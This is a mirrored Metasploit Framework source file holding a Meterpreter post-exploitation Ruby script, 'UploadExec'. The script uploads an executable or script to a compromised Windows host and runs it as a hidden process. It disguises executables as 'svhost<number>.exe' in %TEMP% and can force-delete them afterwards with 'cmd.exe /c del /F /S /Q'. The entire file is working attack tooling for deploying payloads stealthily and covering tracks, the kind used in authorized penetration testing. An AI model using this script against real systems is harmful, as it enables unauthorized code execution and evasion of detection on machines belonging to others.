mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-11-12 11:52:01 +01:00
8aa3a985da
git-svn-id: file:///home/svn/framework3/trunk@7359 4d416f70-5f16-0410-b530-b9f4589650da
114 lines
2.9 KiB
Ruby
114 lines
2.9 KiB
Ruby
# $Id$
|
|
|
|
session = client
|
|
@@exec_opts = Rex::Parser::Arguments.new(
|
|
"-h" => [ false,"Help menu." ],
|
|
"-e" => [ true, "Executable or script to upload to target host." ],
|
|
"-o" => [ true, "Options for executable." ],
|
|
"-p" => [ false,"Path on target to upload executable, default is %TEMP%." ],
|
|
"-v" => [ false,"Verbose, return output of execution of uploaded executable." ],
|
|
"-r" => [ false,"Remove the executable after running it (only works if the executable exits right away)" ]
|
|
)
|
|
|
|
################## function declaration Declarations ##################
|
|
def usage()
|
|
print_line "UploadExec -- upload a script or executable and run it"
|
|
print_line(@@exec_opts.usage)
|
|
end
|
|
|
|
def upload(session,file,trgloc = "")
|
|
if not ::File.exists?(file)
|
|
raise "File to Upload does not exists!"
|
|
else
|
|
if trgloc == ""
|
|
location = session.fs.file.expand_path("%TEMP%")
|
|
else
|
|
location = trgloc
|
|
end
|
|
begin
|
|
ext = file.scan(/\S*(.exe)/i)
|
|
if ext.join == ".exe"
|
|
fileontrgt = "#{location}\\svhost#{rand(100)}.exe"
|
|
else
|
|
fileontrgt = "#{location}\\TMP#{rand(100)}#{ext}"
|
|
end
|
|
print_status("\tUploading #{file}....")
|
|
session.fs.file.upload_file("#{fileontrgt}","#{file}")
|
|
print_status("\t#{file} uploaded!")
|
|
print_status("\tUploaded as #{fileontrgt}")
|
|
rescue ::Exception => e
|
|
print_status("Error uploading file #{file}: #{e.class} #{e}")
|
|
end
|
|
end
|
|
return fileontrgt
|
|
end
|
|
#Function for executing a list of commands
|
|
def cmd_exec(session,cmdexe,opt,verbose)
|
|
r=''
|
|
session.response_timeout=120
|
|
if verbose == 1
|
|
begin
|
|
print_status "\tRunning command #{cmdexe}"
|
|
r = session.sys.process.execute(cmdexe, opt, {'Hidden' => true, 'Channelized' => true})
|
|
while(d = r.channel.read)
|
|
print_status("\t#{d}")
|
|
end
|
|
r.channel.close
|
|
r.close
|
|
rescue ::Exception => e
|
|
print_status("Error Running Command #{cmd}: #{e.class} #{e}")
|
|
end
|
|
else
|
|
begin
|
|
print_status "\trunning command #{cmdexe}"
|
|
r = session.sys.process.execute(cmdexe, opt, {'Hidden' => true, 'Channelized' => false})
|
|
r.close
|
|
rescue ::Exception => e
|
|
print_status("Error Running Command #{cmd}: #{e.class} #{e}")
|
|
end
|
|
end
|
|
end
|
|
def m_unlink(session, path)
|
|
r = session.sys.process.execute("cmd.exe /c del /F /S /Q " + path, nil, {'Hidden' => 'true'})
|
|
while(r.name)
|
|
select(nil, nil, nil, 0.10)
|
|
end
|
|
r.close
|
|
end
|
|
#parsing of Options
|
|
file = ""
|
|
cmdopt = ""
|
|
helpcall = 0
|
|
path = ""
|
|
verbose = 0
|
|
remove = 0
|
|
@@exec_opts.parse(args) { |opt, idx, val|
|
|
case opt
|
|
when "-e"
|
|
file = val || ""
|
|
when "-o"
|
|
cmdopt = val
|
|
when "-p"
|
|
path = val
|
|
when "-v"
|
|
verbose = 1
|
|
when "-h"
|
|
helpcall = 1
|
|
when "-r"
|
|
remove = 1
|
|
end
|
|
|
|
}
|
|
|
|
if file == "" || cmdopt == nil || path == nil
|
|
usage
|
|
end
|
|
print_status("Running Upload and Execute Meterpreter script....")
|
|
exec = upload(session,file,path)
|
|
cmd_exec(session,exec,cmdopt,verbose)
|
|
if remove == 1
|
|
print_status("\tDeleting #{exec}")
|
|
m_unlink(session, exec)
|
|
end
|
|
print_status("Finnished!")
|